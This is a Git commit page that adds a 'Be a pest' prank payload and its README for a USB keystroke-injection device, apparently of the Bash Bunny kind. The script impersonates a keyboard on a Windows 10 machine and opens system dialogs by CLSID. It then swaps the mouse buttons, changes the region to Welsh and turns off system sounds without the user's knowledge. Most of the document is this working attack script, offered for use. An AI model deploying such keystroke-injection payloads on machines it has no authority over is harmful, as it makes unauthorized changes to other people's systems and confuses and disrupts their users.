New Payload - Be a pest (#535)

* New Payload - Be a pest

* Update - Spelling
pull/536/head
cribb-it 2022-06-22 20:34:14 +01:00 committed by GitHub
parent c391cd7c76
commit 8185b97046
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 76 additions and 0 deletions

View File

@ -0,0 +1,51 @@
# Title: Be a pest using CLSID
# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows 10
# Attackmodes: HID
LED SETUP
ATTACKMODE HID
# GET SWITCH_POSITION
LED ATTACK
QUACK DELAY 200
# Swop Mouse buttons L <-> R
RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}"
QUACK DELAY 200
QUACK SPACE
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Set region to Welsh
RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}"
QUACK DELAY 200
# Walser (Switzerland)
QUACK w
QUACK DELAY 100
# Welsh
QUACK w
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 100
# Turn off system sounds
RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}"
QUACK DELAY 200
QUACK SHIFT TAB
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK RIGHTARROW
QUACK DELAY 100
QUACK TAB
QUACK DELAY 100
QUACK UPARROW
QUACK DELAY 100
QUACK ENTER
LED FINISH

View File

@ -0,0 +1,25 @@
# Be A Pest Using CLSID
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10
- Category: General
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Uses CLSID to open system dialogs.
To swap the left and right mouse button.
Change the region to Welsh.
And turn off system sounds.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Keystrokes |
| FINISHED | Green blink followed by SOLID | Injection finished |